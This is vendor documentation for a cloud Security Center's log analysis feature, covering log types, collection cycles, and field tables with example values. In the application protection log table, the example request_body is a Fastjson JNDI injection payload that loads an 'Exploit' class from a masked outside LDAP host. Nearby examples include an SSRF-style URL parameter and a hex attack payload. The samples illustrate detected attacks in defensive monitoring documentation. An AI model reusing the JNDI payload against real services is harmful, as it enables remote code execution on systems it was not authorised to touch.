Security Center log analysis centralizes host activity and security event data for auditing, incident tracing, and threat detection. It covers supported log types, edition-specific availability, log fields, and collection cycles.
Version support
The available log types depend on your Security Center edition or protection level.
Subscription
Host logs
|
Log Type |
Basic |
Anti-virus |
Advanced |
Enterprise |
Ultimate |
|
Logon Flow Logs |
|
|
|
|
|
|
Network Connection Logs |
|
|
|
|
|
|
Process Startup Logs |
|
|
|
|
|
|
Brute-force Attack Logs |
|
|
|
|
|
|
DNS Request Logs |
|
|
|
|
|
|
Client Event Logs |
|
|
|
|
|
|
Account Snapshot Logs |
|
|
|
|
|
|
Network Snapshot Logs |
|
|
|
|
|
|
Process Snapshot Logs |
|
|
|
|
|
Security logs
|
Log Type |
Basic |
Anti-virus |
Advanced |
Enterprise |
Ultimate |
|
Security Alert Logs |
Note
Records only alerts supported by the Basic edition. |
|
|
|
|
|
Vulnerability Logs |
Note
Records only vulnerabilities supported by the Basic edition. |
|
|
|
|
|
Network Defense Logs |
|
|
|
|
|
|
Core File Monitoring Event Logs |
|
|
|
|
|
|
CSPM - Baseline Check Logs |
|
|
|
|
|
Value-added service logs
If you enable any of the following value-added services, Security Center analyzes the logs they generate:
-
Malicious File Detection
-
Agentless Detection
-
Application Protection
-
CSPM(Baseline Check and Cloud Service Configuration Risk)
Pay-as-you-go
If you purchase the Host and Container Security pay-as-you-go service, the available log types vary by the protection level assigned to each server.
Host Logs
|
Log Type |
Unprotected |
Antivirus |
Host Protection |
Hosts and Container Protection |
|
Logon Flow Logs |
|
|
|
|
|
Network Connection Logs |
|
|
|
|
|
Process Startup Logs |
|
|
|
|
|
Brute-force Attack Logs |
|
|
|
|
|
DNS Request Logs |
|
|
|
|
|
Client Event Logs |
|
|
|
|
|
Account Snapshot Logs |
|
|
|
|
|
Network Snapshot Logs |
|
|
|
|
|
Process Snapshot Logs |
|
|
|
|
Security Logs
|
Log Type |
Unprotected |
Antivirus |
Host Protection |
Hosts and Container Protection |
|
Security Alert Logs |
Note
Records only alerts supported by the Unprotected level. |
|
|
|
|
Vulnerability Logs |
Note
Records only vulnerabilities supported by the Unprotected level. |
|
|
|
|
Network Defense Logs |
|
|
|
|
|
Core File Monitoring Event Logs |
|
|
|
|
Pay-as-you-go Service Logs
If you enable any of the following pay-as-you-go services, Security Center analyzes the logs they generate:
-
Malicious File Detection
-
Agentless Detection
-
Application Protection
-
CSPM(Baseline Check,[CONREF:sas.configCheck.config.check])
Log type overview
Log samples and field descriptions are for reference only. Fields may change with product updates. The actual data in SLS reflects the most current schema.
Host logs
Logon flow logs
-
__topic__: aegis-log-login -
Log content:Records server logon events, including source IP, username, and result.
-
Feature description:Monitor user activity and detect anomalous behavior.
ImportantSecurity Center does not collect logon flow logs for servers running Windows Server 2008.
-
Collection cycle: Real-time.
Network connection logs
-
__topic__: aegis-log-network -
Log content:Records real-time network connections on servers, including 5-tuples and associated processes.
-
Feature description:Identify anomalous connection patterns, detect network attacks, and optimize performance.
NoteThe agent collects only a subset of connection states between establishment and termination. Inbound traffic is not recorded.
-
Collection cycle: Real-time.
Process startup logs
-
__topic__: aegis-log-process -
Log content:Records startup events for all new processes, including process name, command-line arguments, and parent process.
-
Feature description:Track process startups, detect abnormal behavior, and identify malware intrusions.
- Collection cycle: Real-time. Logs are reported immediately upon process startup.
Brute-force attack logs
-
__topic__: aegis-log-crack -
Log content:Records brute-force attack attempts against systems, applications, and accounts.
-
Feature description:Identify brute-force attacks, detect abnormal logons, weak passwords, and credential leaks, and support incident response and forensic analysis.
-
Collection cycle: Real-time.
Account snapshot logs
-
__topic__: aegis-snapshot-host -
Log content:Records user account details including username, password policy, and logon history.
-
Feature description:
ImportantCompare snapshots over time to monitor account changes and detect unauthorized access and account status anomalies.
-
Collection cycle: Automatic, based on the asset fingerprint interval (default: once daily). Manual collection also supported.
Network snapshot logs
-
__topic__: aegis-snapshot-port -
Log content:Records network connections including 5-tuples, status, and associated processes.
-
Feature description:Identify active connections, anomalous patterns, and potential network attacks.
-
Collection cycle: Automatic, based on the asset fingerprint interval (default: once daily). Manual collection also supported.
Process snapshot logs
-
__topic__: aegis-snapshot-process -
Log content:Records process activity including process IDs, names, and startup times.
-
Feature description:Monitor process activity and resource consumption; detect abnormal processes, excessive CPU usage, and memory leaks.
-
Collection cycle: Automatic, based on the asset fingerprint interval (default: once daily). Manual collection also supported.
DNS request logs
-
__topic__: aegis-log-dns-query -
Log content:Records DNS queries initiated by the server, including domain names, query types, and sources.
-
Feature description:Analyze DNS activity and detect anomalous queries, domain hijacking, or poisoning.
ImportantLog collection is not supported for Linux servers with a kernel version earlier than 4.x.x.
-
Collection cycle: Real-time.
Client event logs
-
__topic__: aegis-log-client -
Log content:Records Security Center client online/offline events.
-
Feature description:Monitor client availability.
-
Collection cycle: Real-time.
Security logs
All security logs are collected in real time.
Vulnerability logs
-
__topic__: sas-vul-log -
Log content:Records discovered vulnerabilities, including names, statuses, and handling actions.
-
Feature description:Track vulnerabilities, assess security risks, and prioritize remediation.
CSPM - Baseline check logs
-
__topic__: sas-hc-log -
Log content:Records baseline check results including levels, categories, and risk levels.
-
Feature description:Assess baseline security posture and identify configuration risks.
NoteOnly check items that fail for the first time are recorded, along with items that previously passed but fail upon re-inspection.
Security alert logs
-
__topic__: sas-security-log -
Log content:Records security alerts including data sources, details, and severity levels.
-
Feature description:Understand security threats and respond promptly.
CSPM - Cloud platform configuration check logs
-
__topic__: sas-cspm-log -
Log content:Records cloud platform configuration check results and whitelisting operations.
-
Feature description:Identify configuration issues and security risks in the cloud platform.
Network defense logs
-
__topic__: sas-net-block -
Log content:Records network attack events, including attack types and source and destination IP addresses.
-
Feature description:Detect network attacks, respond to threats, and improve network security.
Application protection logs
-
__topic__: sas-rasp-log -
Log content:Records RASP attack alerts, including attack types, behavioral data, and attacker IPs.
-
Feature description:Detect application-layer attacks and improve runtime security.
Malicious file detection logs
-
__topic__: sas-filedetect-log -
Log content:Records malicious file detection results, including file information, detection scenarios, and results.
-
Feature description:Identify malicious programs in offline files or cloud storage for timely handling.
Core file monitoring event logs
-
__topic__: aegis-file-protect-log -
Log content:Records core file monitoring alerts, including file paths, operation types, and alert levels.
-
Feature description:Detect theft or tampering of core files.
Agentless detection logs
-
__topic__: sas-agentless-log -
Log content:Records security risks in cloud servers, disk snapshots, and images, including vulnerabilities, baseline checks, malicious samples, and sensitive files.
-
Feature description:View asset security risks across time periods and identify potential threats.
Host log fields
Logon flow logs
|
Field |
Description |
Example |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
The IP address of the server. |
192.168.XX.XX |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
uuid |
The UUID of the server. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
src_ip |
The source IP address used to log on to the server. |
221.11.XX.XX |
|
dst_port |
The port used for the logon. |
22 |
|
login_type |
The logon type. Values include but are not limited to: |
SSH |
|
username |
The username used for the logon. |
admin |
|
login_count |
The number of logons. Repeated logons within 1 minute are merged into a single entry. For example, a |
3 |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
|
auth_type |
TAuthentication type, string type.
|
1 |
|
success |
Indicates whether the logon was successful. Values: |
true |
|
pid |
The PID of the authentication process. |
12345 |
|
src_port |
The source port number of the logon, string type. |
43006 |
|
ssh_fingerprint |
The SSH key fingerprint used for logon, string type. When key-based authentication is used, this field records the corresponding key fingerprint. When password-based authentication is used, this field is empty. |
SHA256:xxxxxxxxxxxx |
Network connection logs
|
Field |
Description |
Example |
|
cmd_chain |
The process chain. |
[ {"9883":"bash -c kill -0 -- -'6274'"} ... ] |
|
cmd_chain_index |
The process chain index. Use this index to look up the corresponding process chain. |
B184 |
|
container_hostname |
The hostname within the container. |
nginx-ingress-controller-765f67fd4d-**** |
|
container_id |
The container ID. |
4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
|
container_image_id |
The container image ID. |
registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
|
container_image_name |
The container image name. |
registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
|
container_name |
The container name. |
nginx-ingress-**** |
|
container_pid |
The process ID within the container. |
0 |
|
net_connect_dir |
The network connection direction. Values: |
in |
|
dst_ip |
The IP address of the connection receiver. If |
192.168.XX.XX |
|
dst_port |
The port of the connection receiver. |
443 |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
The IP address of the server. |
192.168.XX.XX |
|
parent_proc_name |
The filename of the parent process. |
/usr/bin/bash |
|
pid |
The process ID. |
14275 |
|
ppid |
The parent process ID. |
14268 |
|
proc_name |
The process name. |
nginx |
|
proc_path |
The process path. |
/usr/local/nginx/sbin/nginx |
|
proc_start_time |
The process startup time. |
N/A |
|
connection_type |
The protocol. Values: |
tcp |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
src_ip |
The source IP address. |
100.127.XX.XX |
|
src_port |
The source port. |
41897 |
|
srv_comm |
The command name associated with the grandparent process. |
containerd-shim |
|
status |
The network connection status. Values: 1 (Closed); 2 (Listening); 3 (SYN sent); 4 (SYN received); 5 (Established); 6 (Close wait); 7 (Closing); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB deleted). |
5 |
|
type |
The type of real-time network connection. Values: |
listen |
|
uid |
The ID of the process user. |
101 |
|
username |
The username of the process. |
root |
|
uuid |
The UUID of the server. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Process startup logs
|
Field |
Description |
Example |
|
cmd_chain |
The process chain. |
[ {"9883":"bash -c kill -0 -- -'6274'"} ... ] |
|
cmd_chain_index |
The process chain index. Use this index to look up the corresponding process chain. |
B184 |
|
cmd_index |
The index of each parameter in the command line. Each pair of values marks the start and end position of a parameter. |
0,3,5,8 |
|
cmdline |
The full command line used to start the process. |
ipset list KUBE-6-CLUSTER-IP |
|
comm |
The command name associated with the process. |
N/A |
|
container_hostname |
The hostname within the container. |
nginx-ingress-controller-765f67fd4d-**** |
|
container_id |
The container ID. |
4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
|
container_image_id |
The container image ID. |
registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
|
container_image_name |
The container image name. |
registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
|
container_name |
The container name. |
nginx-ingress-**** |
|
container_pid |
The process ID within the container. |
0 |
|
cwd |
The working directory of the process. |
N/A |
|
proc_name |
The process filename. |
ipset |
|
proc_path |
The full path of the process file. |
/usr/sbin/ipset |
|
gid |
The process group ID. |
0 |
|
groupname |
The user group name. |
group1 |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
The IP address of the server. |
192.168.XX.XX |
|
parent_cmd_line |
The command line of the parent process. |
/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
|
parent_proc_name |
The filename of the parent process. |
kube-proxy |
|
parent_proc_path |
The full path of the parent process file. |
/usr/local/bin/kube-proxy |
|
pid |
The process ID. |
14275 |
|
ppid |
The parent process ID. |
14268 |
|
proc_start_time |
The process startup time. |
2024-08-01 16:45:40 |
|
parent_proc_start_time |
The startup time of the parent process. |
2024-07-12 19:45:19 |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
srv_cmd |
The command line of the grandparent process. |
/usr/bin/containerd |
|
tty |
The logon terminal. N/A indicates the account has never logged on to a terminal. |
N/A |
|
uid |
The user ID. |
123 |
|
username |
The username of the process. |
root |
|
uuid |
The UUID of the server. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Brute-force attack logs
|
Field |
Description |
Example |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
The IP address of the server under brute-force attack. |
192.168.XX.XX |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
uuid |
The UUID of the server under brute-force attack. |
5d83b26b-b7ca-4a0a-9267-12***** |
|
login_count |
The number of failed logon attempts. Repeated attempts within 1 minute are merged into a single entry. For example, a |
3 |
|
src_ip |
The source IP address of the logon attempt. |
47.92.XX.XX |
|
dst_port |
The logon port. |
22 |
|
login_type |
The logon type. Values: |
SSH |
|
username |
The logon username. |
user |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Account snapshot logs
|
Field |
Description |
Example |
|
account_expire |
The account expiration date. The value |
never |
|
domain |
The domain or directory service the account belongs to. N/A means the account does not belong to any domain. |
N/A |
|
groups |
The groups the account belongs to. N/A means the account does not belong to any group. |
["nscd"] |
|
home_dir |
The home directory, the default location for storing and managing files in the system. |
/Users/abc |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
The IP address of the server. |
192.168.XX.XX |
|
last_chg |
The date the password was last changed. |
2022-11-29 |
|
last_logon |
The date and time of the last logon. N/A means the account has never been used to log on. |
2023-08-18 09:21:21 |
|
login_ip |
The remote IP address of the last logon. N/A means the account has never been used to log on. |
192.168.XX.XX |
|
passwd_expire |
The password expiration date. The value |
2024-08-24 |
|
perm |
Whether the account has root permissions. Values: |
0 |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
shell |
The Linux shell. |
/sbin/nologin |
|
status |
The user account status. Values: |
0 |
|
tty |
The logon terminal. N/A means the account has never logged on to a terminal. |
N/A |
|
username |
The username. |
nscd |
|
uuid |
The UUID of the server. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
warn_time |
The password expiration reminder date. The value |
2024-08-20 |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Network snapshot logs
|
Field |
Description |
Example |
|
net_connect_dir |
The network connection direction. Values: |
in |
|
dst_ip |
The peer IP address, generally empty. Note: Because only logs with status 2 are delivered, |
|
|
dst_port |
The port of the connection receiver. |
443 |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
The IP address of the server. |
192.168.XX.XX |
|
pid |
The process ID. |
682 |
|
proc_name |
The process name. |
sshd |
|
connection_type |
The protocol. Values: |
tcp4 |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
src_ip |
The local IP address. |
100.127.XX.XX |
|
src_port |
The listening port. |
41897 |
|
status |
The value is 2, indicating the port is listening; the associated |
5 |
|
uuid |
The UUID of the server. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Process snapshot logs
|
Field |
Description |
Example |
|
cmdline |
The full command line used to start the process. |
/usr/local/share/assist-daemon/assist_daemon |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
The IP address of the server. |
192.168.XX.XX |
|
md5 |
The MD5 hash of the binary file. Files larger than 1 MB are not calculated. |
1086e731640751c9802c19a7f53a64f5 |
|
proc_name |
The process filename. |
assist_daemon |
|
proc_path |
The full path of the process file. |
/usr/local/share/assist-daemon/assist_daemon |
|
pid |
The process ID. |
1692 |
|
pname |
The filename of the parent process. |
systemd |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
proc_start_time |
The process startup time. Built-in field. |
2023-08-18 20:00:12 |
|
uid |
The process user ID. |
101 |
|
username |
The username of the process. |
root |
|
uuid |
The UUID of the server. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
DNS request logs
|
Field |
Description |
Example |
|
domain |
The domain name corresponding to the DNS request. |
example.aliyundoc.com |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
host_ip |
The IP address of the server that initiated the DNS request. |
192.168.XX.XX |
|
pid |
The process ID that initiated the DNS request. |
3544 |
|
ppid |
The parent process ID that initiated the DNS request. |
3408 |
|
cmd_chain |
The process chain that initiated the DNS request. |
"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
|
cmdline |
The command line that initiated the DNS request. |
C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
|
proc_path |
The path of the process that initiated the DNS request. |
C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
time |
The time the DNS request event was captured. This time generally matches the actual occurrence of the DNS request. |
2023-08-17 20:05:04 |
|
uuid |
The UUID of the server that initiated the DNS request. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Client event logs
|
Field |
Description |
Example |
|
uuid |
The UUID of the server. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
host_ip |
The IP address of the server. |
192.168.XX.XX |
|
agent_version |
The client version. |
aegis_11_91 |
|
last_login |
The timestamp of the previous logon, in milliseconds. |
1716444387617 |
|
platform |
The operating system type. Values: |
linux |
|
region_id |
The region ID where the server resides. |
cn-beijing |
|
status |
The client status. Values: |
online |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Security log fields
Vulnerability logs
|
Field |
Description |
Example |
|
vul_alias_name |
The vulnerability alias. |
CESA-2023:1335: openssl Security Update |
|
risk_level |
The risk level. Values: |
later |
|
extend_content |
Extended vulnerability information in JSON format. |
{"cveList":["CVE-2023-0286"],"necessity":{...},"os":"centos",...} |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
internet_ip |
The public IP address of the asset. |
39.104.XX.XX |
|
intranet_ip |
The private IP address of the asset. |
192.168.XX.XX |
|
instance_name |
The hostname. |
hhht-linux-*** |
|
vul_name |
The vulnerability name. |
centos:7:cesa-2023:1335 |
|
operation |
The action performed on the vulnerability. Values: |
new |
|
status |
The vulnerability status. Values: 1 (Unfixed); 2 (Fix failed); 3 (Rollback failed); 4 (Fixing); 5 (Rolling back); 6 (Verifying); 7 (Fixed); 8 (Fixed, restart required); 9 (Rolled back); 10 (Ignored); 11 (Rolled back, restart required); 12 (Does not exist); 13 (Invalid). |
1 |
|
tag |
The vulnerability tag. Values: |
oval |
|
type |
The vulnerability type. Values: |
sys |
|
uuid |
The UUID of the server. |
ad66133a-dc82-4e5e-9659-a49e3**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
CSPM - Baseline check logs
|
Field |
Description |
Example |
|
check_item_name |
The name of the check item. |
Set minimum interval for password changes |
|
check_item_level |
The severity level of the baseline check. Values: |
medium |
|
check_type |
The type of the check item. |
Identity authentication |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
risk_level |
The risk level. Values: |
medium |
|
operation |
The operation. Values: |
new |
|
risk_name |
The name of the risk item. |
Password policy compliance check |
|
sas_group_name |
The asset group of the server in Security Center where the risk item was detected. |
default |
|
status |
The status information. Two sets of status codes apply: Baseline check statuses: 1 (Failed); 2 (Verifying); 6 (Ignored); 7 (Fixing). Handling statuses: 1 (Unfixed); 2 (Fix failed); 3 (Rollback failed); 4 (Fixing); 5 (Rolling back); 6 (Verifying); 7 (Fixed); 8 (Fixed, restart required); 9 (Rolled back); 10 (Ignored); 11 (Rolled back, restart required); 12 (Does not exist); 13 (Invalid). |
1 |
|
sub_type_alias_name |
The alias of the subtype. |
International security best practices - Ubuntu 16/18/20/22 security baseline check |
|
sub_type_name |
The baseline subtype name. For valid values, see the List of baseline types and subtypes. |
hc_ubuntu16_cis_rules |
|
type_alias_name |
The alias of the type. |
International security best practices |
|
type_name |
The baseline type. For valid values, see the List of baseline types and subtypes. |
cis |
|
uuid |
The UUID of the server where the risk item was detected. |
1ad66133a-dc82-4e5e-9659-a49e3**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Security alert logs
|
Field |
Description |
Example |
|
data_source |
The data source. Values: |
aegis_login_log |
|
detail |
A structured object (JSON) providing detailed alert context. Fields vary by alert type. Common values for the |
{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root",...} |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
internet_ip |
The public IP address of the asset. |
39.104.XX.XX |
|
intranet_ip |
The private IP address of the asset. |
192.168.XX.XX |
|
level |
The risk level of the alert event. Values: |
suspicious |
|
name |
The alert name. |
Anomalous Logon - ECS Unusual Account Logon |
|
operation |
The operation. Values: |
new |
|
status |
The alert status. Values: 1 (Unhandled, default for new alerts); 2 (Ignored, after executing the Ignore action); 8 (Whitelisted, after adding to whitelist); 16 (Processing, during end-process/isolate-file/whitelist actions); 32 (Processed, after manual handling or completing end-process/isolate-file actions); 64 (Expired, if no action is taken within 30 days); 513 (Auto-blocked, the alert has been automatically blocked by the precise defense feature of Security Center and does not require manual handling). |
1 |
|
unique_info |
The unique identifier of the alert. |
2536dd765f804916a1fa3b9516b5**** |
|
uuid |
The UUID of the server where the alert was generated. |
ad66133a-dc82-4e5e-9659-a49e3**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
|
suspicious_event_id |
The alert event ID. |
650226318 |
|
handle_time |
The timestamp corresponding to the operation. |
1765272845 |
|
alert_first_time |
The timestamp when the alert first appeared. |
1764226915 |
|
alert_last_time |
The timestamp when the alert last appeared. |
1765273425 |
|
strict_mode |
Indicates whether the alert is in strict mode. Values: |
true |
|
user_id |
The account ID. |
1358******3357 |
CSPM - Cloud platform configuration check logs
|
Field |
Description |
Example |
|
check_id |
The check item ID. You can obtain this ID by calling the |
11 |
|
check_item_name |
The name of the check item. |
Origin fetch configuration |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
instance_name |
The instance name. |
lsm |
|
instance_result |
The impact of the risk, as a JSON string. |
{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,...}]} |
|
instance_sub_type |
The instance subtype. Values depend on |
INSTANCE |
|
instance_type |
The instance type. Values: ECS (Elastic Compute Service); SLB (Server Load Balancer); RDS (ApsaraDB RDS); MONGODB (ApsaraDB for MongoDB); KVSTORE (ApsaraDB for Redis); ACR (Container Registry); CSK; VPC (Virtual Private Cloud); ACTIONTRAIL (ActionTrail); CDN (Content Delivery Network); CAS (Certificate Management Service); RDC (Apsara DevOps); RAM (Resource Access Management); DDoS (Anti-DDoS); WAF (Web Application Firewall); OSS (Object Storage Service); PolarDB (PolarDB); POSTGRESQL (ApsaraDB RDS for PostgreSQL); MSE (Microservices Engine); NAS (File Storage NAS); SDDP (Sensitive Data Discovery and Protection); EIP (Elastic IP Address). |
ECS |
|
region_id |
The region ID where the instance resides. |
cn-hangzhou |
|
requirement_id |
The requirement ID. You can obtain this ID by calling the |
5 |
|
risk_level |
The risk level. Values: |
MEDIUM |
|
section_id |
The section ID. You can obtain this ID by calling the |
1 |
|
standard_id |
The standard ID. You can obtain this ID by calling the |
1 |
|
status |
The check item status. Values: |
PASS |
|
vendor |
The cloud service provider. Fixed value: |
ALIYUN |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Network defense logs
|
Field |
Description |
Example |
|
cmd |
The command line of the attacked process. |
nginx: master process nginx |
|
cur_time |
The time the attack event occurred. |
2023-09-14 09:21:59 |
|
decode_payload |
The payload converted from HEX to characters. |
POST /Services/FileService/UserFiles/ |
|
dst_ip |
The IP address of the attacked asset. |
172.16.XX.XX |
|
dst_port |
The port of the attacked asset. |
80 |
|
func |
The type of the intercepted event. Values: |
payload |
|
rule_type |
The specific rule type of the intercepted event. Values: |
alinet_payload |
|
instance_id |
The instance ID of the attacked asset. |
i-2zeg4zldn8zypsfg**** |
|
internet_ip |
The public IP address of the attacked asset. |
39.104.XX.XX |
|
intranet_ip |
The private IP address of the attacked asset. |
192.168.XX.XX |
|
final_action |
The defense action. Fixed value: |
block |
|
payload |
The payload in HEX format. |
504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
|
pid |
The ID of the attacked process. |
7107 |
|
platform |
The system type of the attacked asset. Values: |
linux |
|
proc_path |
The path of the attacked process. |
/usr/sbin/nginx |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
src_ip |
The source IP address of the attack. |
106.11.XX.XX |
|
src_port |
The source port of the attack. |
29575 |
|
uuid |
The UUID of the server. |
5d83b26b-b7ca-4a0a-9267-12**** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Application protection logs
|
Field |
Description |
Example |
|
app_dir |
The directory where the application resides. |
/usr/local/aegis/rasp/apps/1111 |
|
app_id |
The application ID. |
6492a391fc9b4e2aad94**** |
|
app_name |
The application name. |
test |
|
confidence_level |
The detection algorithm confidence level. Values: |
low |
|
request_body |
The request body. |
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
|
request_content_length |
The length of the request body. |
112 |
|
data |
The hook point parameters. |
{"cmd":"bash -c kill -0 -- -'31098' "} |
|
headers |
The request headers. |
{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial",...} |
|
hostname |
The name of the host or network device. |
testhostname |
|
host_ip |
The private IP address of the host. |
172.16.XX.XX |
|
is_cliped |
Indicates whether the log was truncated due to exceeding the length limit. Values: |
false |
|
jdk_version |
The JDK version. |
1.8.0_292 |
|
message |
The alert description. |
Unsafe class serial. |
|
request_method |
The HTTP request method. |
Post |
|
platform |
The operating system type. |
Linux |
|
arch |
The operating system architecture. |
amd64 |
|
kernel_version |
The operating system kernel version. |
3.10.0-1160.59.1.el7.x86_64 |
|
param |
The request parameters. Common formats include GET parameters and application/x-www-form-urlencoded. |
{"url":["http://127.0.0.1.xip.io"]} |
|
payload |
The effective attack payload. |
bash -c kill -0 -- -'31098' |
|
payload_length |
The length of the attack payload. |
27 |
|
rasp_id |
The unique ID of the RASP probe. |
fa00223c8420e256c0c98ca0bd0d**** |
|
rasp_version |
The RASP probe version. |
0.8.5 |
|
src_ip |
The IP address of the requester. |
172.0.XX.XX |
|
final_action |
The alert handling result. Values: |
block |
|
rule_action |
The alert handling method specified by the rule. Values: |
block |
|
risk_level |
The risk level. Values: |
high |
|
stacktrace |
The stack trace. |
[java.io.FileInputStream.<init>(FileInputStream.java:123), ...] |
|
time |
The time the alert was triggered. |
2023-10-09 15:19:15 |
|
timestamp |
The timestamp when the alert was triggered, in milliseconds. |
1696835955070 |
|
type |
The attack type. Values: |
rce |
|
url |
The request URL. |
http://127.0.0.1:999/xxx |
|
rasp_attack_uuid |
The UUID of the attack event. |
18823b23-7ad4-47c0-b5ac-e5f036a2**** |
|
uuid |
The host UUID. |
23f7ca61-e271-4a8e-bf5f-165596a16**** |
|
internet_ip |
The public IP address of the host. |
1.2.XX.XX |
|
intranet_ip |
The private IP address of the host. |
172.16.XX.XX |
|
sas_group_name |
The Security Center server group name. |
Group 1 |
|
instance_id |
The host instance ID. |
i-wz995eivg28f1m** |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
Malicious file detection logs
|
Field |
Description |
Example |
|
bucket_name |
The OSS bucket name. |
***-test |
|
event_id |
The alert ID. |
802210 |
|
event_name |
The alert name. |
Mining program |
|
md5 |
The MD5 hash of the file. |
6bc2bc******53d409b1 |
|
sha256 |
The SHA256 hash of the file. |
f038f9525******7772981e87f85 |
|
result |
The detection result. Values: |
0 |
|
file_path |
The file path. |
test.zip/bin_test |
|
etag |
The OSS file identifier. |
6BC2B******853D409B1 |
|
risk_level |
The risk level. Values: |
remind |
|
source |
The detection scenario. Values: |
OSS |
|
parent_md5 |
The MD5 hash of the parent file or archive file. |
3d0f8045bb9****** |
|
parent_sha256 |
The SHA256 hash of the parent file or archive file. |
69b643d6******a3fb859fa |
|
parent_file_path |
The name of the parent file or archive file. |
test.zip |
|
start_time |
The start timestamp, in seconds. Also used to indicate the time when the event occurred. |
1719472214 |
|
compress_file_number |
The subfile sequence number in an archive, in the format [current]/[total]. For example, 1/10 means this is file 1 of 10 in the archive. |
1/10 |
Core file monitoring event logs
|
Field |
Description |
Example |
|
start_time |
The latest occurrence time of the event, in seconds. |
1718678414 |
|
uuid |
The UUID of the client. |
5d83b26b-b**a-4**a-9267-12**** |
|
file_path |
The file path. |
/etc/passwd |
|
proc_path |
The process path. |
/usr/bin/bash |
|
rule_id |
The ID of the matched rule. |
123 |
|
rule_name |
The rule name. |
file_test_rule |
|
cmdline |
The command line. |
bash /opt/a |
|
operation |
The operation performed on the file. |
READ |
|
risk_level |
The alert level. |
2 |
|
pid |
The process ID. |
45324 |
|
proc_permission |
The process permissions. |
rwxrwxrwx |
|
instance_id |
The instance ID. |
i-wz995eivg2**** |
|
internet_ip |
The public IP address. |
192.0.2.1 |
|
intranet_ip |
The private IP address. |
172.16.0.1 |
|
instance_name |
The instance name. |
aegis-test |
|
platform |
The operating system type. |
Linux |
Agentless detection logs
Common fields
|
Field |
Description |
Example |
|
uuid |
The UUID of the server. |
ad66133a-dc82-4e5e-9659-a49e3**** |
|
instance_id |
The instance ID. |
i-2zeg4zldn8zypsfg**** |
|
internet_ip |
The public IP address of the asset. |
39.104.XX.XX |
|
intranet_ip |
The private IP address of the asset. |
192.168.XX.XX |
|
sas_group_name |
The asset group of the server in Security Center. |
default |
|
start_time |
